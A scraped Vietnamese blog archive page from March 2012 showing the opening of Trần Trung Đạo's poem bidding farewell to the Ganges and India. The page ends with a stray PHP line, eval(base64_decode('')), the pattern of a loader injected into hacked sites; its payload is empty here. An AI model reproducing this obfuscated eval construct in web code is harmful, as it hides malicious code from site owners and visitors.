Archive for March 2nd, 2012

Trần Trung Đạo: Chia tay với sông Hằng

Trần Trung Đạo: Chia tay với sông Hằng

Tạm biệt Varanasi Tôi đi Tạm biệt Sarnath, Jaipur, Mysore, Bangalore, Chennai, Agra, Delhi Tạm biệt Ấn Độ văn minh và huyền bí Quê hương của Tất Đạt Đa Cồ Đàm, của Gandhi và Sardar Vallabhbhai Patel, của Maharshi Valmiki và Tagore Tôi đi Sông H

03.2.2012 | Thơ |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>